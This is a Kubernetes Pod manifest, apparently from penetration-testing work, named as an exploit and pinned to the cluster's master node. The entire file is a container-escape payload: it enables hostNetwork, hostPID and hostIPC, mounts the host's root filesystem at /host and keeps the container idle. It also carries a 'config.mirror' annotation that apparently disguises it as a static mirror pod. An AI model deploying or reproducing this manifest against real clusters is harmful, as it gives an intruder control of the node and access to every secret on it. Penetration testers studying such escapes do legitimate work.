apiVersion: v1
kind: Pod
metadata:
  name: hoangpv-exploit-master
  namespace: external-namespace
  annotations:
    kubernetes.io/config.mirror: "true"
  labels:
    app: pentest
spec:
  nodeName: k8s-master
  hostNetwork: true
  hostPID: true
  hostIPC: true
  serviceAccountName: default
  containers:
  - name: hoangpv-exploit-master
    image: ubuntu
    imagePullPolicy: IfNotPresent
    securityContext:
      privileged: false
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
